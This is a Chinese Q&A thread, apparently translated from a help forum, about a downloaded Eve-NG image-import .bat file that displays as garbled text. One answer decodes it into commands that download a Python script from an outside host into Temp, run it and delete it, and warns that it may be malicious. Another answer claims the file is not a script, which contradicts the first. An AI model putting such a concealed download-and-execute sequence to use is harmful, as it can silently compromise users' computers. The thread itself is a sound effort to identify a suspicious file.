我下载了一个.Bat 文件,它是一个用于将图像(IOS)导入“Eve-NG”模拟器的脚本,我从未使用过“脚本”,也没有使用过批处理文件。
我希望能够编辑这个文件,我的目的是改变图像托管的路径,因为这个“脚本”的作用是远程下载图像,然后将它们导入到“Eve-NG”,我想改变这些参数。
但是当我打开文件时,我只能看到这样的“Unicode字符”。
ഊ敀档景൦瀊⁹洭瀠灩椠獮慴汬ⴠ⁕楰൰挊獬楰㍰椠獮慴汬渠瑥業潫楰㍰椠獮慴汬挠汯牯摥畣汲ⴠ┢獵牥牰景汩╥䅜灰慄慴䱜捯污呜浥屰整灭瀮≹栠瑴㩰⼯敳牣瑥搮整档浳条挮浯猯牣灩灴椯慭敧楫祰ⴠ猭汳渭ⵯ敲潶敫汣൳猊慴瑲⼠眯楡⁴祰桴湯∠甥敳灲潲楦敬尥灁䑰瑡屡潌慣屬敔灭瑜浥祰ഢ搊汥⼠┢獵牥牰景汩╥䅜灰慄慴䱜捯污呜浥屰整灭瀮≹慰獵
您能否告诉我如何使用这些文件以及我应该学习什么?
答案1
该文件的前几个字节似乎导致记事本(以及 Notepad++)显示垃圾。
但是使用 Unixless或strings命令会返回以下内容:
@echo off
py -m pip install -U pip
pip3 install netmiko
pip3 install colored
curl -o "%userprofile%\AppData\Local\Temp\temp.py" http://secret.dtechsmag.com/scriptp/imagekit.py --ssl-no-revoke
start /b /wait python "%userprofile%\AppData\Local\Temp\temp.py"
del /f "%userprofile%\AppData\Local\Temp\temp.py"
pause
我对 Python 了解不够,无法告诉您它从 secret.dtechsmag.com 下载(并随后运行)的内容是否是恶意的。
我建议你要小心谨慎。
答案2
.bat此 RAR 档案包含一个文件,尽管其名称如此,但该文件并非脚本。
如果它在其他地方被描述为.bat文件,则是不正确的,或者该文件使用某些未知的实用程序进行编码/加密。
如果您不知道该文件是如何创建或编码的,并且使用相同的应用程序进行解码/解密,那么您就无法处理该文件。